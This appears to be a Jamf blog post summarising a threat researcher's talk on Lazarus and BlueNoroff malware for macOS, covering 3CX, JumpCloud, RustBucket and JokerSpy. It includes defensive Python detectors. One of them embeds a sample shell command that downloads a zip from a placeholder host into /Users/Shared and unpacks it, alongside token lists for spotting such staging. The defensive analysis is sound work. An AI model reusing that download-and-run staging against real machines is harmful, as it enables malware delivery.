Jamf Blog
September 27, 2023 by Hannah Hamilton

Analyzing state-sponsored malware on macOS

In this JNUC presentation, Ferdous Saljooki, Senior Threat Researcher at Jamf Threat Labs, takes a deep dive into malware developed by the Lazarus APT group, and their subgroup, BlueNoroff. This includes analysis of the 3CX and JumpCloud supply chain attacks, RustBucket malware and JokerSpy spyware, among others.

Malware analysis tools

Saljooki begins his talk by explaining a possible setup for a malware analysis environment. Some of the tools he mentions are:

  • MachOView and MachOExplorer to view macOS binaries
  • Apparency to check code signing
  • Hex Fiend, a hex editor
  • Hopper Disassembler to dynamically debug, analyze and disassemble a binary
  • LuLu for network monitoring
  • Wireshark for network packet analysis
  • And more!

Your environment can be virtual or “metal.” For the former, Saljooki mentions Virtual Buddy, while for the latter he mentions a dedicated Mac Mini or other Apple device.

VirusTotal and the Objective-See malware repositories offer malware samples for reference and comparison.

Lazarus APT group

The Lazarus advanced persistent threat (APT) group is a North Korean state-sponsored group. While previously focused on Windows, they have extended their scope to macOS as it becomes more popular. They have been active since at least 2009 and are known for sophisticated cyber espionage and cyber crime campaigns, such as their attack on Sony Pictures Entertainment in 2014 and the 2017 WannaCry ransomware attack. Using spearphishing emails, fake software updates, malicious apps and other vectors, they are known to:

  • Exfiltrate sensitive data
  • Perform reconnaissance on systems
  • Establish persistence with LaunchAgents/daemons
  • Execute DDoS attacks

Coinbase and Crypto.com lures

A recent campaign by Lazarus, coined Operation Dream Job, distributed decoy PDFs that looked like job listings related to cryptocurrency. The goal was likely to conduct espionage and steal crypto assets, with targets associated with cryptocurrency exchanges.

The Coinbase lure spearphished victims on LinkedIn, sending them to a malicious PDF. The first-stage component is a signed FinderFontsUpdater app in ~/Library/Fonts. The first-stage payload shows the victim the PDF while retrieving the second-stage component, safarifontsagent. The second-stage component is used to fetch the third stage, which was not available because the command and control (C2) server was offline.

Similar to the Coinbase lure, the crypto.com lure began with spearphishing and promises of a job. However, this method establishes persistence as well. Watch the presentation for more details on this lure.

3CX supply chain attack

3CX is legitimate, signed and notarized VoIP software. Its build servers were compromised by Lazarus, leading to builds containing malware. The first-stage component was a malicious dylib, .libffmpeg.dylib. This component:

  1. Checks to see if a session log file exists, and if not, terminates and creates a hidden main storage file.
  2. Creates a distinct UUID by combining the hostname, OS version and other system artifacts.
  3. Retrieves the second-stage component, UpdateAgent, by sending a POST request to the C2 server with a specially crafted cookie.

The second-stage component:

  1. Opens a legitimate 3CX config file to obtain the URL and account name values.
  2. Decrypts the UUID from the file using the XOR key 0x7A, then combines and encrypts the extracted data and formats as a value for a cookie.
  3. Sends a POST request to the C2 server using the formatted cookie value in an HTTP header.
  4. Terminates.

While this may seem anticlimactic, Saljooki suspects that the final payload is only delivered to certain users. The second-stage UpdateAgent could be swapped for a full-featured implant on targets of interest.

JumpCloud supply chain attack

In this attack, a JumpCloud employee was spearphished via email. Malicious code was injected into JumpCloud's commands framework via a lightweight Ruby script. This would establish persistence and install a number of backdoors on the victim's system. These backdoors include:

  • FULLHOUSE.DOORED, a C/C++ backdoor with process injection that executes shell commands and manages and transfers files
  • STRATOFEAR, a modular backdoor that retrieves modules from C2 or from disk and executes them
  • TIEDYE, a backdoor that collects system information and executes additional payload and shell commands

BlueNoroff APT group

The BlueNoroff group is a subgroup of the Lazarus APT group that targets financial institutions, casinos, financial trade software and cryptocurrency companies. They are attributed to the 2016 attack on the Bangladesh Bank that successfully stole over 100 million USD. Some of their other campaigns include DangerousPassword, CryptoMimic and SnatchCrypto. Watch the presentation for more information about this APT group.

XCSSET malware

This type of malware uses cURL to fetch AppleScript source, pipes it to osacompile to compile it and writes the result to disk. The malware can be an ad-hoc signed or unsigned applet. Variants of this malware can be identified by looking for the headers specific to compiled AppleScript together with cURL usage.

RustBucket malware

A suspicious PDF viewer was found with key indicators of XCSSET malware. It contained a suspicious script, main.scpt, and was compiled with Script Editor and left unsigned. This malware, coined RustBucket, contains an applet executable that invokes the suspicious script, main.scpt.
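The triage heuristic described for XCSSET and reused here for the RustBucket applet (a compiled main.scpt that shells out to cURL) can be scripted. The following is an added example, not code from the presentation or from Jamf Threat Labs; the sample bytes and the bundle layout are constructed, and the detection relies only on the well-known "FasdUAS" magic that begins compiled AppleScript files.

```python
# Magic bytes at the start of every compiled AppleScript (.scpt) file.
APPLESCRIPT_MAGIC = b"FasdUAS"
# Strings that, inside a compiled script, match the XCSSET/RustBucket staging
# pattern: cURL fetching a payload, osacompile, unzip into /Users/Shared.
SUSPICIOUS_TOKENS = (b"curl", b"osacompile", b"unzip", b"/users/shared")


def analyze_scpt(data: bytes) -> dict:
    """Classify one file body: is it compiled AppleScript, and which tokens appear?"""
    compiled = data.startswith(APPLESCRIPT_MAGIC)
    # bytes.lower() only touches ASCII letters, so it is safe on UTF-16 text too.
    lowered = data.lower()
    hits = []
    for tok in SUSPICIOUS_TOKENS:
        # Compiled scripts may store string literals as UTF-16, so check both forms.
        utf16_form = tok.decode().encode("utf-16-be")
        if tok in lowered or utf16_form in lowered:
            hits.append(tok.decode())
    return {"compiled": compiled, "tokens": hits,
            "suspicious": compiled and "curl" in hits}


def triage_bundle(files: dict) -> list:
    """files maps paths inside an .app bundle to their bytes (read from disk in
    practice). Returns (path, tokens) for each compiled script that uses cURL."""
    findings = []
    for path, data in files.items():
        if path.endswith(".scpt"):
            result = analyze_scpt(data)
            if result["suspicious"]:
                findings.append((path, result["tokens"]))
    return findings


# Constructed stand-in for a compiled main.scpt: the real magic prefix, then the
# kind of shell one-liner the RustBucket stage-one applet runs (UTF-16 literal).
SAMPLE_SCPT = (APPLESCRIPT_MAGIC + b" 1.101.10\x0e\x00\x01\x00"
               + ('do shell script "curl -o /Users/Shared/pdf.zip '
                  'https://example.invalid/p.zip; unzip -o /Users/Shared/pdf.zip '
                  '-d /Users/Shared/"').encode("utf-16-be"))

# Constructed applet layout: only the script path and a benign PDF are modelled.
SAMPLE_BUNDLE = {
    "Contents/Resources/Scripts/main.scpt": SAMPLE_SCPT,
    "Contents/Resources/decoy.pdf": b"%PDF-1.4 constructed placeholder",
}

if __name__ == "__main__":
    for path, tokens in triage_bundle(SAMPLE_BUNDLE):
        print(f"suspicious compiled AppleScript: {path} ({', '.join(tokens)})")
```

A run-only compiled script hides its source from Script Editor but keeps the same magic, so this check still fires on it; only the string literals become harder to read.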

Saljooki investigates stage one of RustBucket by viewing the source code in main.scpt — possible because it was not compiled as run-only. This script contains a cURL command that creates a zip file in the /users/shared/ directory, unzips the file, then opens a new PDF viewer app.

In stage two, this PDF viewer looks similar to the original applet, but instead carries an ad-hoc signature. It also doesn’t contain an applet, but a Mach-O executable. There is also a PDF included that explains how to override Gatekeeper, which attempts to block execution of the app. The application in stage two is ultimately a PDF viewer, and does not initially communicate with external servers.

By searching VirusTotal, Saljooki found two PDFs related to this PDF viewer. These PDFs claim they must be viewed with the software, obscuring the text from the reader. In the presentation, Saljooki investigates the Mach-O executable from stage two with Hopper Disassembler. He is able to see how these PDFs hide their contents from the reader, then reveal them once opened in the malicious software. Upon viewing a document, the malware sends a POST request to the C2 server to download the third-stage payload — the server was not available to deliver the payload. He was eventually able to analyze the stage-two component and craft a cURL request from the information gathered to obtain the third-stage payload.

The third-stage payload grabs the computer name, current timestamp, installation timestamp, system boot time and running processes, and checks for a VM. All of this is sent to C2 in a POST request; the malware then sleeps for 60 seconds and repeats the process. It can also receive commands and download/execute additional payloads.
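The fixed 60-second sleep between POST requests described above is the kind of regularity network monitoring can pick up. As an added example (not from the presentation or from Jamf), the following beacon detector groups outbound POSTs by process and destination and flags series whose inter-request gaps cluster tightly around a period; the event lines and the host names are constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed outbound HTTP events (timestamp, process, destination host, method),
# shaped like what a macOS network monitor such as LuLu would surface.
SAMPLE_EVENTS = """\
2023-09-27T10:00:00 PDFViewer beacon.example.invalid POST
2023-09-27T10:00:12 Safari www.example.invalid GET
2023-09-27T10:01:00 PDFViewer beacon.example.invalid POST
2023-09-27T10:01:45 Safari www.example.invalid GET
2023-09-27T10:02:01 PDFViewer beacon.example.invalid POST
2023-09-27T10:03:00 PDFViewer beacon.example.invalid POST
2023-09-27T10:03:30 Safari cdn.example.invalid GET
2023-09-27T10:04:00 PDFViewer beacon.example.invalid POST
"""


def parse_events(text: str) -> list:
    """Parse whitespace-separated event lines into (datetime, process, host, method)."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, proc, host, method = line.split()
            events.append((datetime.fromisoformat(ts), proc, host, method))
    return events


def find_beacons(events: list, period: float = 60.0, jitter: float = 5.0,
                 min_hits: int = 4) -> list:
    """Report (process, host) pairs whose POSTs recur every `period` seconds.
    The median gap must sit within `jitter` of the period and the gaps must be
    tight (population stddev <= jitter), so ordinary browsing does not match."""
    series = defaultdict(list)
    for ts, proc, host, method in events:
        if method == "POST":
            series[(proc, host)].append(ts)
    findings = []
    for (proc, host), stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if abs(median(gaps) - period) <= jitter and pstdev(gaps) <= jitter:
            findings.append({"process": proc, "host": host,
                             "hits": len(stamps), "median_gap": median(gaps)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_events(SAMPLE_EVENTS)):
        print(f"possible beacon: {f['process']} -> {f['host']} "
              f"({f['hits']} POSTs, median gap {f['median_gap']:.0f}s)")
```

Because the implant sleeps 60 seconds after each request completes, real gaps drift slightly above the period, which is why the jitter tolerance is applied rather than an exact match.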

Watch the presentation to:

  • View a demo of this malware from the user perspective
  • Learn why Rust was chosen for the malware and what the difficulties of reversing Rust-compiled malware are
  • Find out how to detect RustBucket with endpoint security and network monitoring software

Read more about RustBucket in Jamf Threat Labs’ full writeup.

JokerSpy spyware

To end the session, Saljooki briefly talks about JokerSpy spyware. This spyware targeted a Japanese cryptocurrency exchange, deploying an “XCC” Swift spyware stager. XCC checks FullDiskAccess and ScreenRecording permissions, and was observed being executed by multiple processes. It was determined that initial access was likely a malicious or backdoored plugin or third-party dependency.

This spyware downloaded a Python backdoor used to deploy the macOS Swiftbelt enumeration tool. This backdoor can:

  • Surveil the host device
  • Execute commands
  • Exfiltrate data
  • Delete files

Register for JNUC to access this session as well as others on demand.

Hannah Hamilton
Hannah Hamilton, Copywriter.